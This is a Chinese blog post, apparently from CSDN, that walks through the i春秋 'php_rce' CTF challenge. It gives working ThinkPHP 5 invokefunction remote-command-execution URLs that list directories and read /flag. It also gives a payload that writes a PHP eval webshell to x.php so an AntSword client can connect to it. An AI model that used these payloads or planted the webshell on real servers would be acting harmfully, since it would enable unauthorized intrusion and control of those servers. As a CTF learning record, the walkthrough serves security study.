i春秋之php_rce

最新推荐文章于 2024-10-14 18:02:58 发布
最新推荐文章于 2024-10-14 18:02:58 发布
阅读量696 收藏
点赞数 1
分类专栏: CTFのWriteUp 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/123002017
版权
该篇博客详细介绍了如何利用ThinkPHP框架的漏洞进行系统命令执行,以获取服务器上的flag文件。首先确定框架版本,然后通过GitHub查找相关漏洞信息。通过构造payload,尝试执行ls、cd等命令遍历目录,最终找到并读取到flag文件的内容。此外,还提到了通过上传一句话木马并通过蚁剑连接来寻找flag的另一种方法。
摘要由CSDN通过智能技术生成

打开连接

立马拿到思路,应该是利用ThinkPHP框架的漏洞拿到flag

在此之前应该先确定框架的准确版本号

知道框架版本是V5了,在网上搜索一下ThinkPHP V5

这里推荐在GitHub社区搜

GitHub中文社区 (githubs.cn)

 选中第一个,进去瞧瞧

这里列出了一堆漏洞,关于payload的构造

先随便试试某一条看看,试试5版本的

直接报错了,还提示了版本号,那就好办了

 这里先试一下5.0.21的命令执行漏洞system

URL?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

 id为想要执行的命令,也就是system('ls'),先执行ls看一下目录文件有啥

URL?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

发现了当前目录的一些文件,好像也没放flag的地方,向上一级看看,在当前URL后面加上 ../

URL?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ../

 好像也没有,还是直接看看根目录吧

命令 ls /

URL?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

 找到flag的文件了,用命令cat进去看看

URL?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

 发现flag

当然还可以通过另一种方法,就是上传一句话木马,再用蚁剑或者是菜刀连接,一个个文件打开看看

让系统执行命令

echo '<?php @eval($_POST["x"]); ?>' >x.php

 意思是在x.php的文件(不存在就创建)里输出<?php @eval($_POST["x"]); ?>这句话

参考

echo命令 – 输出字符串或提取Shell变量的值 – Linux命令大全(手册) (linuxcool.com)

文件上传漏洞(一句话木马)-学习笔记_小龙在线-CSDN博客_一句话木马上传

所以构建payload

URL?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST["x"]); ?>' >x.php

然后打开蚁剑

点击添加

 

 在里面就能找到放flag的文件啦

 

 

金 帛
关注
专栏目录
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
【ThinkPHP5 5.0.22/5.1.29 RCE
xhwfa的博客
05-02 3309
一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。 二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080,出现如
一面基本问题
m0_61980779的博客
09-01 2103
OWASP TOP10,应急
2022年i春秋春季赛勇者赛道部分wp
XINO
05-09 1079
差几名就能拿奖了,还是太菜了 Misc 签到 照着图片弹钢琴就会出现flag tiger 一个rot47加密,一个lsb隐写加密 之后得到解压密码71zr9H6jnXRHn64WBxMbCzz16saCZWiw 发现好像需要明文攻击来解密码Nh6i@= 二维码存在零宽隐写,这里话有个坑点,直接扫好像是提不出来的,可以写个脚本来提 或者我看wp可以用bcTester来题(GET新点)之后用网站解码就可以 https://yuanfux.github.io/zero-width-web/ 接着就是维吉尼亚密码解
php get_object_vars()函数
苦艾文艺
08-23 7107
get_object_vars :返回由对象属性组成的关联数组       For example:          class Point2D{       public  $x,$y;       public $label;               public function __construct($x,$y){       $this->x=$x;      
php view_vars,PHP中的一个句子中有多个vars赋值
weixin_29669143的博客
04-11 93
标签:php我问这个var赋值定义可能会导致什么:$component = $id = $class = '';我的意思是IDE(phpStorm)允许,该代码不返回任何警告,致命信息或其他任何信息,但是….那里有什么?你怎么看?解决方法:没关系PHP在写系统上使用副本.这意味着在更改时确实会在内存中创建诸如字符串或整数之类的原始类型,并且在您的示例中可能还可以.PHP$component = $...
ThinkPHP5.0.21&5.1.* 代码执行和命令执行漏洞利用
weixin_34414196的博客
03-05 621
ThinkPHP5.0.21&5.1.* 代码执行和命令执行漏洞利用 ThinkPHP5.0.21&5.1.* exploit code execution and command execution vulnerabilities 5.0.21 ?s=index/\think\app/invokefunction&function=call_user_func_a...
[i春秋]Mercy-code
Landasika的博客
05-15 601
Mercy-code(无参REC) 题目源码 <?php highlight_file(__FILE__); if ($_REQUEST['cmd']) { $cmd = $_REQUEST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if(preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|
无参数RCE
m0_62422842的博客
05-11 1581
正则的递归 正则表达式中有一种递归的用法,今天才知道。但是这种递归用法并不是所有语言都支持。它适用于PHP和java等语言。 以下列出几个简单的递归 (?R)? (?0)? \g<0>? 加号 , + 星号 * 问号 ? 一般来说问号也是递归的一种 一般用到最多就是?R。 括号里不能有参数,而有些题中就就会用这种递归的正则来过滤恶意函数,所以我们就用无参的函数像上图中套娃一样注入命令。 无参数RCE 一般情况下的命令执行都是由参数的,比如system函数,eval函数 ...
春秋云境—Initial
龙狼刺的博客
07-15 2009
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
千寻的博客
12-19 5432
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现(工具)修复建议摘抄免责声明 漏洞名称 ThinkPHP 5.0.23 远程代码执行漏洞 漏洞编号 CVE-2018-20062 漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在
CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现
alert['Hello World']
01-24 2505
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固参考链接 漏洞描述   CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在php 5
【原创】Ichunqiu云境 —— Endless(无间计划) Writeup
WUfagg的博客
03-21 883
Author:小离-xiaoli。
php伪静态的写法,php伪静态的写法
weixin_35102377的博客
03-19 319
伪静态对于大多数较为正规的网站都会有用到,这些问题自然而然也就成为了一些php爱好者?们的追求,在很多mvc框架中伪静态成为了一种必须,去除服务器配置 看下下边4种方法,你可能对此很感兴趣 ?php //伪静态方法一 // localhost/php100/test.php?id|1@actio伪静态对于大多数较为正规的网站都会有用到,这些问题自然而然也就成为了一些php爱好者?们的追求,在很多m...
Qualitor checkAcesso.php 任意文件上传漏洞复现(CVE-2024-44849)
0xSec
10-09 403
​Qualitor 8.24及之前版本存在任意文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell,进一步控制服务器权限。
使用API接口创建短链接【PHP版】
weixin_43833373的博客
10-10 684
C1N短网址(c1n.cn)还提供了丰富的短链接管理的API接口,只需进行简单的接口调用,就能将稳定好用的短链接系统接入到自己的产品中,极大地降低了开发成本。上述代码中使用到的token需要前往C1N短网址(c1n.cn)-控制台-我的信息进行查询。
【FastAdmin】全栈视角下的页面跳转实现:从原生html、javascrpt、php技术到jQuery、FastAdmin框架
田辛_DensinTian的专栏
10-09 794
页面跳转是Web开发中的基本操作,不同的技术栈提供了不同的实现方法。本文将详细介绍在原生JavaScript、原生HTML、原生PHP、jQuery以及FastAdmin框架中实现页面跳转的各种方法,并分析每种方法的优势、劣势和适用场景。
0.0.0.0 127.0.0.1等几个特殊的IP地址
zhurobert的博客
10-10 516
0.0.0.0 127.0.0.1 255.255.255.255等特殊地址
PHP小课堂】一起学习PHP中的反射(一)
最新发布
硬核项目经理
10-14 964
一起学习PHP中的反射(一)反射这个名词相信大家不会陌生,但反过来说,这个反射到底是一个什么概念呢?其实反射,就是通过一些方法函数,来获得一个类或者一个实例化对象中的一些信息。当然,更重要的是,它可以是在运行时来动态获取这些信息的。这样的话,有很多功能就可以通过反射来实现了。比如说 Java 中的注解,在一些 PHP 的框架中,要实现类似的注解功能,就是通过反射来获得注释中的信息来实现的。大家可以...
攻防世界php_rce
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值